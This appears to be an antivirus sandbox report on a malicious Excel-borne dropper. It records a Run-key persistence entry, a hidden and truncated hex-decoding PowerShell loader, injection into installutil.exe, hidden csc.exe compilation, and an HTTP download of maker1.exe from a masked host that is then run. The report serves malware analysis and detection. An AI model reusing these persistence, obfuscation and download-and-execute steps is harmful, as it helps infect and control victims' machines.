Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'maker' = '%HOMEPATH%\Pictures\maker.exe'
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function r964f5 {param($v8bea)$yc37d66='xaf8d7e';$j84dcb='';for ($i=0; $i -lt $v8bea.length;$i+=2){$d146db6=[convert]::ToByte($v8bea.Substring($i,2),16);$j84dcb+=[char]($d...
Injects code into
the following system processes:
- %WINDIR%\microsoft.net\framework\v4.0.30319\installutil.exe
Modifies file system
Creates the following files
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{0098416c-bdbd-4885-8dc3-d17de5b4269b}.tmp
- %TEMP%\mlocjsmj.dll
- %TEMP%\bdud5yql.dll
- %TEMP%\dfkmv0ts.dll
- %TEMP%\zwzjfozv.dll
- %TEMP%\resd218.tmp
- %TEMP%\resd19b.tmp
- %TEMP%\resd0ef.tmp
- %TEMP%\resd043.tmp
- %TEMP%\n9b9g9g4.dll
- %TEMP%\rescfd6.tmp
- %TEMP%\cscd207.tmp
- %TEMP%\cscd18a.tmp
- %TEMP%\cscd0cf.tmp
- %TEMP%\cscd033.tmp
- %APPDATA%\ge59e.exe
- %TEMP%\csccfc5.tmp
- %TEMP%\dfkmv0ts.cmdline
- %TEMP%\dfkmv0ts.0.cs
- %TEMP%\bdud5yql.out
- %TEMP%\bdud5yql.cmdline
- %TEMP%\bdud5yql.0.cs
- %TEMP%\n9b9g9g4.out
- %TEMP%\n9b9g9g4.cmdline
- %TEMP%\n9b9g9g4.0.cs
- %TEMP%\mlocjsmj.out
- %TEMP%\mlocjsmj.cmdline
- %TEMP%\mlocjsmj.0.cs
- %TEMP%\zwzjfozv.out
- %TEMP%\zwzjfozv.cmdline
- %TEMP%\zwzjfozv.0.cs
- %TEMP%\dfkmv0ts.out
- %HOMEPATH%\pictures\maker.exe
Deletes the following files
- %TEMP%\rescfd6.tmp
- %TEMP%\cscd207.tmp
- %TEMP%\dfkmv0ts.out
- %TEMP%\dfkmv0ts.0.cs
- %TEMP%\dfkmv0ts.pdb
- %TEMP%\dfkmv0ts.dll
- %TEMP%\dfkmv0ts.cmdline
- %TEMP%\bdud5yql.dll
- %TEMP%\mlocjsmj.out
- %TEMP%\bdud5yql.pdb
- %TEMP%\bdud5yql.0.cs
- %TEMP%\bdud5yql.out
- %TEMP%\mlocjsmj.dll
- %TEMP%\mlocjsmj.cmdline
- %TEMP%\mlocjsmj.pdb
- %TEMP%\resd218.tmp
- %TEMP%\bdud5yql.cmdline
- %TEMP%\cscd18a.tmp
- %TEMP%\resd043.tmp
- %TEMP%\csccfc5.tmp
- %TEMP%\n9b9g9g4.0.cs
- %TEMP%\n9b9g9g4.out
- %TEMP%\n9b9g9g4.pdb
- %TEMP%\n9b9g9g4.cmdline
- %TEMP%\n9b9g9g4.dll
- %TEMP%\cscd033.tmp
- %TEMP%\cscd0cf.tmp
- %TEMP%\zwzjfozv.0.cs
- %TEMP%\zwzjfozv.pdb
- %TEMP%\zwzjfozv.dll
- %TEMP%\zwzjfozv.cmdline
- %TEMP%\zwzjfozv.out
- %TEMP%\resd0ef.tmp
- %TEMP%\resd19b.tmp
- %TEMP%\mlocjsmj.0.cs
Network activity
TCP
HTTP GET requests
- http://ip###sta.com/maker1.exe
UDP
- DNS ASK ip###sta.com
Miscellaneous
Creates and executes the following
- '%APPDATA%\ge59e.exe'
- '%HOMEPATH%\pictures\maker.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function r964f5 {param($v8bea)$yc37d66='xaf8d7e';$j84dcb='';for ($i=0; $i -lt $v8bea.length;$i+=2){$d146db6=[convert]::ToByte($v8bea.Substring($i,2),16);$j84dcb+=[char]($d...' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zwzjfozv.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\mlocjsmj.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\n9b9g9g4.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\bdud5yql.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\dfkmv0ts.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCFD6.tmp" "%TEMP%\CSCCFC5.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD043.tmp" "%TEMP%\CSCD033.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD0EF.tmp" "%TEMP%\CSCD0CF.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD19B.tmp" "%TEMP%\CSCD18A.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD218.tmp" "%TEMP%\CSCD207.tmp"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c copy "%APPDATA%\ge59e.exe" "%HOMEPATH%\Pictures\maker.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c, "%HOMEPATH%\Pictures\maker.exe"' (with hidden window)
Executes the following
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zwzjfozv.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\mlocjsmj.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\n9b9g9g4.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\bdud5yql.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\dfkmv0ts.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCFD6.tmp" "%TEMP%\CSCCFC5.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD043.tmp" "%TEMP%\CSCD033.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD0EF.tmp" "%TEMP%\CSCD0CF.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD19B.tmp" "%TEMP%\CSCD18A.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD218.tmp" "%TEMP%\CSCD207.tmp"
- '%WINDIR%\syswow64\cmd.exe' /c copy "%APPDATA%\ge59e.exe" "%HOMEPATH%\Pictures\maker.exe"
- '%WINDIR%\syswow64\cmd.exe' /c, "%HOMEPATH%\Pictures\maker.exe"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\installutil.exe'
